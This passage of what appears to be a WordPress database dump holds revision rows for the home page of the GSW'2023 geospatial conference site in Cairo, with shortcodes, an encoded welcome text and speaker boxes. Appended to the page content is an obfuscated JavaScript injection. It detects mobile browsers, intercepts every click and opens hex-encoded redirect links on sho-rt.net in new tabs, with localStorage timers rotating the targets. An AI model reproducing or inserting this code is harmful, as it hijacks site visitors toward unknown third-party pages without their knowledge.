_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-20 11:26:35','2022-10-20 11:26:35','',2167,'https://gsw2023.com/?p=2911',0,'revision','',0),
(2912,1,'2022-10-20 11:28:45','2022-10-20 11:28:45','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-20 11:28:45','2022-10-20 11:28:45','',2167,'https://gsw2023.com/?p=2912',0,'revision','',0),
(2913,1,'2022-10-20 11:29:15','2022-10-20 11:29:15','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column 